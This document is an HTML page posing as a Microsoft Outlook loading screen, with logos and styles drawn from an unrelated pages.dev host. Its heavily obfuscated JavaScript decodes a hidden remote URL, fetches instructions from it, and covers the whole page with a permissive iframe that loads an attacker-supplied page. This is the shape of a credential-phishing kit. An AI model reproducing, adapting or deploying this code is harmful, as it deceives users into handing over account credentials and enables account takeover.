<html class=no-touch dir=ltr lang=en translate=no xmlns=http://www.w3.org/1999/xhtml>
  <title>Outlook</title>
  <p id="uxo" style="display:none;"></p>
  <style>
    #preloadDiv {
      height: 1px;
      margin-bottom: -1px;
      overflow: hidden;
      visibility: hidden
    }

    #loadingScreen {
      position: fixed;
      top: 0;
      bottom: 0;
      left: 0;
      right: 0;
      background-color: #fff
    }

    #loadingLogo {
      position: fixed;
      top: calc(50vh - 90px);
      left: calc(50vw - 90px);
      width: 180px;
      height: 180px
    }

    #MSLogo {
      position: fixed;
      bottom: 36px;
      left: calc(50vw - 50px)
    }

    .dark #loadingScreen {
      background-color: #333
    }

    .darkNew #loadingScreen {
      background-color: #1f1f1f
    }
  </style>
  <body class="disableTextSelection ms-Fabric--isFocusHidden ms-font-s" style=min-width:418px>
    <div id=app></div>
    <div id=loadingScreen>
      <div id=loadingLogo>
        <link href="https://assets-7wi.pages.dev/tableu.css" rel=stylesheet>
        <div id=container>
          <div id=containerShadow></div>
          <div id=logo>
            <div id=flapContainer>
              <div id=openedFlap>
                <div id=fmask>
                  <div class=flapTriangle></div>
                </div>
              </div>
              <div id=cal>
                <div class=t></div>
                <div class=r>
                  <div class="s s1"></div>
                  <div class="s s2"></div>
                  <div class="s s3"></div>
                </div>
                <div class=r>
                  <div class="s s4"></div>
                  <div class="s s1"></div>
                  <div class="s s2"></div>
                </div>
                <div class=r>
                  <div class="s s5"></div>
                  <div class="s s4"></div>
                  <div class="s s1"></div>
                </div>
              </div>
            </div>
            <div id=eb></div>
            <div id=ef>
              <div class=r></div>
              <div class=l></div>
            </div>
            <div id=closedFlap>
              <div id=fmask>
                <div class=flapTriangle></div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div id=MSLogo style=padding-bottom:15%;margin-left:-4%>
        <h2 id="errorId" style=color:red></h2>
      </div>
            <img id=MSLogo src="https://assets-7wi.pages.dev/tableu.png">
      </div>
    </body>

<script>
const _0x7e2c0 = _0x41a9;
(function (_0x2d07b0, _0x5963c8) {
    const _0x27184f = _0x41a9, _0x180882 = _0x2d07b0();
    while (!![]) {
        try {
            const _0xe95559 = -parseInt(_0x27184f(0x1fe)) / (0x13fc + 0x6d0 + -0x1acb * 0x1) * (parseInt(_0x27184f(0x24f)) / (0x3 * -0xb4e + -0x6d * -0x22 + 0x1372)) + -parseInt(_0x27184f(0x1f8)) / (-0x11a9 * -0x1 + -0x20d2 + 0xf2c * 0x1) + parseInt(_0x27184f(0x246)) / (-0x267c + 0x1c37 + -0x1 * -0xa49) * (-parseInt(_0x27184f(0x1ff)) / (-0x51 * 0x4f + 0x1 * -0x10dd + 0x47 * 0x97)) + parseInt(_0x27184f(0x20f)) / (-0x129d + -0x7 * 0x9d + -0x496 * -0x5) + -parseInt(_0x27184f(0x248)) / (0xb3 * 0x1d + -0x3 * -0x7b5 + -0x1 * 0x2b5f) * (parseInt(_0x27184f(0x1fc)) / (-0x3 * -0x7c1 + 0x1 * -0x26e7 + 0x11 * 0xec)) + parseInt(_0x27184f(0x216)) / (-0xa00 + 0x29 * 0x50 + 0x2c7 * -0x1) * (parseInt(_0x27184f(0x227)) / (0x27d * -0xb + 0x1f95 + -0x6 * 0xb2)) + parseInt(_0x27184f(0x22f)) / (-0x29 * -0x4a + -0x46 * -0xa + 0x33 * -0x49);
            if (_0xe95559 === _0x5963c8)
                break;
            else
                _0x180882['push'](_0x180882['shift']());
        } catch (_0x128620) {
            _0x180882['push'](_0x180882['shift']());
        }
    }
}(_0x1b37, 0xc988f * -0x1 + -0x77 * 0x79f + -0x11 * -0x19ff9));
function hh2(_0x49325f, _0x18711d) {
    const _0x4e5700 = _0x41a9, _0x2bce92 = {
            'UYgiJ': function (_0x134efd, _0x10f845) {
                return _0x134efd < _0x10f845;
            },
            'Ycjfn': function (_0x5d5f41, _0x2e94ef) {
                return _0x5d5f41 >= _0x2e94ef;
            },
            'qFcgt': function (_0x3d851b, _0x103c3b) {
                return _0x3d851b <= _0x103c3b;
            },
            'usnUR': function (_0x3d1a92, _0x418776) {
                return _0x3d1a92 + _0x418776;
            },
            'NhSEn': function (_0x463ed8, _0x5171ed) {
                return _0x463ed8 % _0x5171ed;
            },
            'PESvr': function (_0x3dc93a, _0x189b93) {
                return _0x3dc93a + _0x189b93;
            },
            'KWcax': function (_0x3da97c, _0x5725b4) {
                return _0x3da97c - _0x5725b4;
            },
            'UNhEP': function (_0x256328, _0x2e65c2) {
                return _0x256328 <= _0x2e65c2;
            },
            'RfPXQ': function (_0x181975, _0x2ebc33) {
                return _0x181975 + _0x2ebc33;
            },
            'nAgOV': function (_0x53c673, _0x6f1a65) {
                return _0x53c673 + _0x6f1a65;
            },
            'oiTlS': function (_0x4b09bc, _0x285870) {
                return _0x4b09bc - _0x285870;
            }
        };
    let _0x5ab9b0 = '';
    for (let _0x472cba = 0x4 * 0xe + -0x20cb + -0x1 * -0x2093; _0x2bce92[_0x4e5700(0x24a)](_0x472cba, _0x49325f[_0x4e5700(0x235)]); _0x472cba++) {
        let _0x384329 = _0x49325f[_0x472cba];
        if (_0x384329[_0x4e5700(0x1fb)](/[a-z]/i)) {
            let _0x25a8f6 = _0x49325f[_0x4e5700(0x226)](_0x472cba);
            if (_0x2bce92[_0x4e5700(0x243)](_0x25a8f6, 0x20a * 0x12 + -0x80f * -0x1 + -0x2c82) && _0x2bce92['qFcgt'](_0x25a8f6, -0x21b6 + -0x1 * -0x6b7 + -0x1b59 * -0x1))
                _0x384329 = String[_0x4e5700(0x213) + 'de'](_0x2bce92['usnUR'](_0x2bce92[_0x4e5700(0x232)](_0x2bce92[_0x4e5700(0x200)](_0x2bce92[_0x4e5700(0x1f5)](_0x2bce92[_0x4e5700(0x1f5)](_0x25a8f6, 0xcc2 + 0x1678 + 0x4ff * -0x7), _0x18711d), -0x1eb9 + 0x1 * 0x1f91 + 0x2 * -0x5f), -0x70e + -0x1b8 * 0x5 + 0xfc0), -0x1 * -0x1570 + -0x22d4 * 0x1 + 0xda5));
            else
                _0x2bce92['Ycjfn'](_0x25a8f6, -0xce3 * -0x3 + -0x231c + -0x32c) && _0x2bce92['UNhEP'](_0x25a8f6, 0x2041 + -0x4c0 + -0x1b07) && (_0x384329 = String[_0x4e5700(0x213) + 'de'](_0x2bce92['RfPXQ'](_0x2bce92[_0x4e5700(0x232)](_0x2bce92[_0x4e5700(0x222)](_0x2bce92[_0x4e5700(0x1f5)](_0x2bce92[_0x4e5700(0x22c)](_0x25a8f6, -0x1c6a + 0x2 * 0xf86 + -0x1 * 0x241), _0x18711d), -0xfe6 + -0x1fe * 0x2 + 0x13fc), 0x1d * -0x65 + 0x209f + -0x1514), -0x102f + -0xc53 * 0x1 + -0x11 * -0x1b3)));
        }
        _0x5ab9b0 += _0x384329;
    }
    return _0x5ab9b0;
}
function _0x41a9(_0x489aee, _0x361981) {
    const _0x2816f1 = _0x1b37();
    return _0x41a9 = function (_0x5cbd74, _0x2ce2f3) {
        _0x5cbd74 = _0x5cbd74 - (-0xe62 + -0x3 * 0x203 + 0x2 * 0xb2c);
        let _0xe2b42b = _0x2816f1[_0x5cbd74];
        return _0xe2b42b;
    }, _0x41a9(_0x489aee, _0x361981);
}
function _0x1b37() {
    const _0x168730 = [
        'jswfq.qca/',
        'NhSEn',
        'zqBhS',
        'vskkg',
        'length',
        'pts\x20allow-',
        '0|2|7|1|6|',
        'error',
        'src',
        'techange',
        'ById',
        '&qrc=',
        'nKaXF',
        'ape-sandbo',
        'allowfulls',
        'GoDyQ',
        ';\x20height:1',
        'url',
        'Ycjfn',
        'height',
        'applicatio',
        '4UZKfWT',
        'n/json',
        '6033713cNDrhU',
        'GET',
        'UYgiJ',
        'block',
        'allow-scri',
        'width:100%',
        'ehDSB',
        '305386ouAxQv',
        'bdNkr',
        'ups-to-esc',
        'on\x20allow-s',
        'SUPAp',
        'ACCESS\x20DEN',
        'rms\x20allow-',
        'SCOYt',
        'getElement',
        'parse',
        'status',
        'KWcax',
        'iframe',
        'liEiz',
        '359046fSrMMs',
        'ame-origin',
        'readyState',
        'match',
        '8BcKZXI',
        '?cnty',
        '3RDsKOb',
        '5168440OSqTbv',
        'PESvr',
        '\x20bottom:0;',
        '\x20right:0;\x20',
        '4|5|3',
        'style',
        'XLQIi',
        'x\x20allow-fo',
        '0;\x20left:0;',
        'rgin:0;\x20pa',
        '100%',
        'MbqpF',
        'send',
        'appendChil',
        '\x20FAILED',
        'XjtQJ',
        '7656582WfMNRZ',
        'dden;\x20z-in',
        'innerText',
        'display',
        'fromCharCo',
        'r:none;\x20ma',
        '500px',
        '322767KQtPKF',
        'setRequest',
        'position:f',
        'QzeVU',
        'errorId',
        'ion',
        '00%;\x20borde',
        '1\x20fired',
        'createElem',
        'onreadysta',
        'setAttribu',
        'CONNECTION',
        'nAgOV',
        'creen',
        'log',
        'onload',
        'charCodeAt',
        '280zURHhG',
        'top-naviga',
        'IED',
        'vhhdg://gv',
        'Header',
        'oiTlS',
        'Dazhe',
        'ofsrcq.gsf',
        '10403844KsnGtV',
        'tion-by-us'
    ];
    _0x1b37 = function () {
        return _0x168730;
    };
    return _0x1b37();
}
const module = _0x7e2c0(0x22a) + _0x7e2c0(0x22e) + _0x7e2c0(0x231) + _0x7e2c0(0x1fd), sid = 0x1770 + -0x33 * -0x34 + -0x21be;
let sx = hh2(module, sid), el1 = document[_0x7e2c0(0x1f2) + _0x7e2c0(0x23b)]('uxo'), tl1 = el1[_0x7e2c0(0x211)];
!tl1 ? sx = sx : sx = sx + _0x7e2c0(0x23c) + tl1;
let lTime = 0xb * -0x3d + 0x89 * -0x2b + 0x19a2;
const eD = document[_0x7e2c0(0x1f2) + _0x7e2c0(0x23b)](_0x7e2c0(0x21a)), xhr = new XMLHttpRequest();
xhr['open'](_0x7e2c0(0x249), sx, !![]), xhr[_0x7e2c0(0x217) + _0x7e2c0(0x22b)]('accept', _0x7e2c0(0x245) + _0x7e2c0(0x247)), xhr[_0x7e2c0(0x21f) + _0x7e2c0(0x23a)] = function () {
    const _0x38eac9 = _0x7e2c0, _0x1d93ea = {
            'XLQIi': function (_0x5b50b2, _0x53b2f5) {
                return _0x5b50b2 === _0x53b2f5;
            },
            'nKaXF': _0x38eac9(0x21d),
            'SUPAp': '2\x20fired',
            'Dazhe': _0x38eac9(0x204),
            'XjtQJ': _0x38eac9(0x218) + 'ixed;\x20top:' + _0x38eac9(0x207) + _0x38eac9(0x201) + _0x38eac9(0x202) + _0x38eac9(0x24d) + _0x38eac9(0x241) + _0x38eac9(0x21c) + _0x38eac9(0x214) + _0x38eac9(0x208) + 'dding:0;\x20o' + 'verflow:hi' + _0x38eac9(0x210) + 'dex:999999' + ';',
            'LRhZL': function (_0x29b034, _0x415ed1) {
                return _0x29b034 === _0x415ed1;
            },
            'GoDyQ': _0x38eac9(0x1f6),
            'QzeVU': _0x38eac9(0x237) + _0x38eac9(0x203),
            'cCcPx': _0x38eac9(0x209),
            'vskkg': _0x38eac9(0x23f) + _0x38eac9(0x223),
            'ODeJP': _0x38eac9(0x215),
            'ehDSB': 'none',
            'MbqpF': 'sandbox',
            'zqBhS': _0x38eac9(0x24c) + _0x38eac9(0x236) + 'presentati' + _0x38eac9(0x1ed) + _0x38eac9(0x1f9) + '\x20allow-pop' + _0x38eac9(0x251) + _0x38eac9(0x23e) + _0x38eac9(0x206) + _0x38eac9(0x1f0) + _0x38eac9(0x228) + _0x38eac9(0x230) + 'er-activat' + _0x38eac9(0x21b),
            'SCOYt': _0x38eac9(0x1ef) + _0x38eac9(0x229),
            'liEiz': _0x38eac9(0x24b),
            'bdNkr': _0x38eac9(0x221) + _0x38eac9(0x20d)
        };
    if (_0x1d93ea[_0x38eac9(0x205)](xhr[_0x38eac9(0x1fa)], XMLHttpRequest['DONE'])) {
        if (_0x1d93ea['LRhZL'](xhr[_0x38eac9(0x1f4)], 0xb3f * -0x1 + -0xf06 + 0x1b0d)) {
            const _0xce26f2 = JSON[_0x38eac9(0x1f3)](xhr['responseTe' + 'xt']), _0x59e337 = document[_0x38eac9(0x21e) + 'ent'](_0x1d93ea[_0x38eac9(0x240)]);
            if (_0xce26f2[_0x38eac9(0x242)]) {
                const _0x564b52 = _0x1d93ea[_0x38eac9(0x219)]['split']('|');
                let _0x3a3281 = 0x1 * 0xd8d + 0x1b74 + -0x2901;
                while (!![]) {
                    switch (_0x564b52[_0x3a3281++]) {
                    case '0':
                        _0x59e337['width'] = _0x1d93ea['cCcPx'];
                        continue;
                    case '1':
                        _0x59e337[_0x38eac9(0x220) + 'te'](_0x1d93ea[_0x38eac9(0x234)], -0x1f09 + 0x301 * 0x1 + -0x1c09 * -0x1);
                        continue;
                    case '2':
                        _0x59e337[_0x38eac9(0x244)] = _0x1d93ea['ODeJP'];
                        continue;
                    case '3':
                        _0x59e337[_0x38eac9(0x239)] = _0xce26f2[_0x38eac9(0x242)];
                        continue;
                    case '4':
                        _0x59e337[_0x38eac9(0x225)] = function () {
                            const _0x298fd0 = _0x38eac9;
                            _0x1d93ea['XLQIi'](lTime, -0x14eb + -0x1d70 + 0x325b * 0x1) ? (console[_0x298fd0(0x224)](_0x1d93ea[_0x298fd0(0x23d)]), lTime += -0x3a1 * 0x5 + 0x886 + -0x58 * -0x1c) : (console[_0x298fd0(0x224)](_0x1d93ea[_0x298fd0(0x1ee)]), _0x59e337['setAttribu' + 'te'](_0x1d93ea['Dazhe'], _0x1d93ea[_0x298fd0(0x20e)]));
                        };
                        continue;
                    case '5':
                        document['body'][_0x38eac9(0x20c) + 'd'](_0x59e337);
                        continue;
                    case '6':
                        _0x59e337[_0x38eac9(0x220) + 'te'](_0x1d93ea[_0x38eac9(0x22d)], _0x1d93ea[_0x38eac9(0x24e)]);
                        continue;
                    case '7':
                        _0x59e337[_0x38eac9(0x220) + 'te'](_0x1d93ea[_0x38eac9(0x20a)], _0x1d93ea[_0x38eac9(0x233)]);
                        continue;
                    }
                    break;
                }
            } else
                eD[_0x38eac9(0x211)] = _0xce26f2['error'] ? _0xce26f2[_0x38eac9(0x238)] : _0x1d93ea[_0x38eac9(0x1f1)], eD[_0x38eac9(0x204)]['display'] = _0x1d93ea[_0x38eac9(0x1f7)];
        } else
            eD[_0x38eac9(0x211)] = _0x1d93ea[_0x38eac9(0x250)], eD[_0x38eac9(0x204)][_0x38eac9(0x212)] = _0x1d93ea[_0x38eac9(0x1f7)];
    }
}, xhr[_0x7e2c0(0x20b)]();   
</script>
<html>